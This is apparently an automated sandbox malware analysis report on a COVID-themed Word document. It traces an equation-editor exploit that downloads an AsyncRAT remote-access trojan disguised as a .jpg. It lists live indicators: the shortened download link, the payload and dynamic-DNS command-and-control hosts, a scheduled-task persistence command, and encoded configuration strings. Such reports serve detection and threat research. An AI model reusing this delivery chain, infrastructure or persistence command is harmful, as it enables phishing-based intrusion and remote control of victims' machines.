Loading ...

Play interactive tourEdit tour

Analysis Report Deadly Variants of Covid 19.doc

Overview

General Information

Sample Name:Deadly Variants of Covid 19.doc
Analysis ID:356233
MD5:3d9171d094dae1fb8da244756dd9733c
SHA1:91e43ec7a21e7e8c1fc2a6202ca3545974084ad2
SHA256:4d1bde540b3c45739e1d8cff08e801ccb6ff9caad391109dc298b011a914e57c
Tags:COVID-19docWHO

Most interesting Screenshot:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected AsyncRAT
Connects to a URL shortener service
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 896 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2276 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2384 cmdline: C:\Users\Public\69577.exe MD5: DCCD2F6A61F8D95552863B537F2B6698)
      • schtasks.exe (PID: 824 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • 69577.exe (PID: 2468 cmdline: C:\Users\Public\69577.exe MD5: DCCD2F6A61F8D95552863B537F2B6698)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          Process Memory Space: 69577.exe PID: 2384JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.69577.exe.25b56fc.5.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              7.2.69577.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                4.2.69577.exe.25b56fc.5.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  4.2.69577.exe.249fdd4.4.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    4.2.69577.exe.249fdd4.4.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2276, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2384
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2276, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2276, TargetFilename: C:\Users\Public\69577.exe
                      Sigma detected: Scheduled temp file as task from temp locationShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Users\Public\69577.exe, ParentProcessId: 2384, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp', ProcessId: 824
                      Sigma detected: Executables Started in Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2276, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2384
                      Sigma detected: Execution in Non-Executable FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2276, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2384
                      Sigma detected: Suspicious Program Location Process StartsShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2276, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2384

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpgReversingLabs: Detection: 10%
                      Source: C:\Users\user\AppData\Roaming\rLliXAh.exeReversingLabs: Detection: 10%
                      Source: C:\Users\Public\69577.exeReversingLabs: Detection: 10%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Deadly Variants of Covid 19.docReversingLabs: Detection: 25%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpgJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\rLliXAh.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\69577.exeJoe Sandbox ML: detected
                      Source: 7.2.69577.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: C:\Users\Public\69577.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                      Source: C:\Users\Public\69577.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                      Source: C:\Users\Public\69577.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                      Source: C:\Users\Public\69577.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                      Source: global trafficDNS query: name: bit.ly
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 79.134.225.49:5000 -> 192.168.2.22:49169
                      Connects to a URL shortener serviceShow sources
                      Source: unknownDNS query: name: bit.ly
                      Uses dynamic DNS servicesShow sources
                      Source: unknownDNS query: name: greatestyear2021.ddns.net
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 79.134.225.49:5000
                      Source: Joe Sandbox ViewIP Address: 79.134.225.49 79.134.225.49
                      Source: Joe Sandbox ViewIP Address: 93.89.224.134 93.89.224.134
                      Source: Joe Sandbox ViewIP Address: 67.199.248.10 67.199.248.10
                      Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
                      Source: global trafficHTTP traffic detected: GET /2Me6ei3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: sgkmudder.org.tr
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AD9C643-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /2Me6ei3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /2d/mgLD5CcdJx9YVKl.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: sgkmudder.org.tr
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: bit.ly
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: 69577.exe, 00000007.00000003.2127625486.00000000047F2000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: 69577.exe, 00000007.00000002.2351786512.000000000047C000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enP
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2352229975.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 69577.exe, 00000007.00000002.2354290555.0000000005BB0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: 2Me6ei3[1].htm.2.drString found in binary or memory: http://sgkmudder.org.tr/2d/mgLD5CcdJx9YVKl.jpg
                      Source: 69577.exe, 00000004.00000002.2116750494.0000000005EE0000.00000002.00000001.sdmp, 69577.exe, 00000007.00000002.2353539025.0000000004CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: 69577.exe, 00000007.00000002.2351810236.00000000004B6000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpgJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00465948
                      Source: C:\Users\Public\69577.exeCode function: 4_2_0046DD70
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004636CA
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00465720
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00463FA9
                      Source: C:\Users\Public\69577.exeCode function: 4_2_0046488F
                      Source: C:\Users\Public\69577.exeCode function: 4_2_0046408B
                      Source: C:\Users\Public\69577.exeCode function: 4_2_0046492F
                      Source: C:\Users\Public\69577.exeCode function: 4_2_0046412B
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004649CF
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004641CB
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464A6A
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464268
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464B0A
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464308
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464BA4
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004643A8
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464442
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464C41
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004644E2
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004674E8
                      Source: C:\Users\Public\69577.exeCode function: 4_2_0046457F
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00464619
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00460EEA
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004646B9
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00465710
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004647EF
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00463FF1
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00696418
                      Source: C:\Users\Public\69577.exeCode function: 4_2_006955D0
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00695078
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00384DB8
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00385688
                      Source: C:\Users\Public\69577.exeCode function: 7_2_003871F8
                      Source: C:\Users\Public\69577.exeCode function: 7_2_00384A70
                      Source: 7.2.69577.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: 'GKyOs4mqqffrORbI+/SRDpDoWIHE7D9sSHoEMvC02sIHmvCDNWQu4eQ2CSkUkryaSTqv1Lc7sX9a+95BfwlqKlGP3NE0911acn24pjupCiE=', 'Nyi0F1igo6v0KFrZP/hXZp+cU2YJnVu/jH17vtFNQvjANrhd2gEnvSMfQLWpCkMG2YDOvKHxP+/Ed1RXXjNjXg==', 'PJvf6bLPQIzvp8wi/eJWbZHAwDKMh+cb/S+IhaLtlwSfyWDkQU2XZyXl+lgfFG4zKsH7M+94v9G7neDSBUAszHbQprcp0xVzEqueEcaNfWo=', 'SzbRAzvKp9S6tfVPQfLVUFAiQFnjWbsmGAzWOjoEVvwxh7SQdPpHnJgMgW3n31m1Wi/hT6EIwlsXa7tTDyG7OG5TIESVBspdbC2Xo07c3oKXej8l/baWaLEwTfQJBdKNEQ8zpDfJP/Y80vcE7WXkivLhevxA0jUhiyeilRdeepKYb+LyWhoASZaxQ5U0KOB9hd9V4d+N9tzdsenqCbX2RFlLrpqjFk9UMCEPCvAqxm9UfwGImD7JBnHbo5b14gG5XwGAxawe+QFu2JPLStNIhbGNGrPAGaWV3eJrlCe458zkIzS9ZDQYgygVH1sxqdaWEtLF3Q7iLZNCERN+x8SQXFDyPAFtjfSvyCSU8ko2rAidaNHd6U0QhN1EVf9OsCkpi4zZ/QRMsnc1VdrAckbN9awauiSbVs5aGVMeSYbPSm7bdqfyU8GUkUGk0ksUpPXkl5CNagqniV8EuAQ2Aj/bj/0AlNABwURRx6DYo+MZmOcFi0kaKzE72HBF86b4hpQk2rbH6CqzLA+ADPojq4EuxnFvZ1UIzK55S5FEa6WIs7wu7R1U/YIiTgO+6rX8R1hTCh8UMNPl0hY2ib05HaWzOOfGAmMtBaDT/d0VQGifCWuJ1NWv25IkfVqEhMPasUO41gdIcvk2K2AdW/KyON3rwHCcb5bDoXgPMOtAw8gX+ecOLFddUKYUsGYSPXaY5BRV1ok/nqDdzkECgpRR960P+ohfMMnOf2BhYY84yUmniwHEckRhZnrYmPhUNSG9vdkVci827X1DTE6b0xupNLWji6jtz8g8xQL5WXuRNbvJMJqq+IlvwRpaQ62gwzDO7p+jFO9wbUSE+1X/QhOBojWGLvItpBNmO16U33gu10ZOYzAeD3Y6uLf4wJ5um+1Sd/xXD8YssVao0cyOcvzRnbsiPlDWUl3BhIF+E0xCOY6VtcXAVanZzff0TQgB6WEJCM+mmDOEeOpo40CbqktDHXRDgw==', 'ze7mDq6AUfAO4/XDqQ9KTDg/4gOhNcqJuhRKQPbWcWLDUwjqOkgZYOg88ry1jyxgCtiIJ2Oab8L0207OXaDh4Q==', 'w9QHBiF4GNH2OE1WWIq/iALIlOVzLN+eqm/CymJld2qvp0cHlkpQL4Im9GSZcrsfLCcV3GOanTpc07FT5fkDjA==', 'zZ0k0sT0L/YwqUO6mapP8hk2zsVknfrnj4e56GEKR0bJWQifogqCb6TzWELfE3WRd7vTZ1NLZ/TYPymQl7E0hg==', 'I6q2Evg/k/+LyIZ7xcwC8YgfnMNMpCKwrpsAsAEsWsTJkSQGH4VaK19V1ua8Wc5qxzd88ykyr3AqWIZemNNifg=='
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@8/18@3/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$adly Variants of Covid 19.docJump to behavior
                      Source: C:\Users\Public\69577.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................P.......................(.P.....P.......H...............Lq......................................................................
                      Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\69577.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: Deadly Variants of Covid 19.docReversingLabs: Detection: 25%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
                      Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
                      Source: C:\Users\Public\69577.exeProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\69577.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
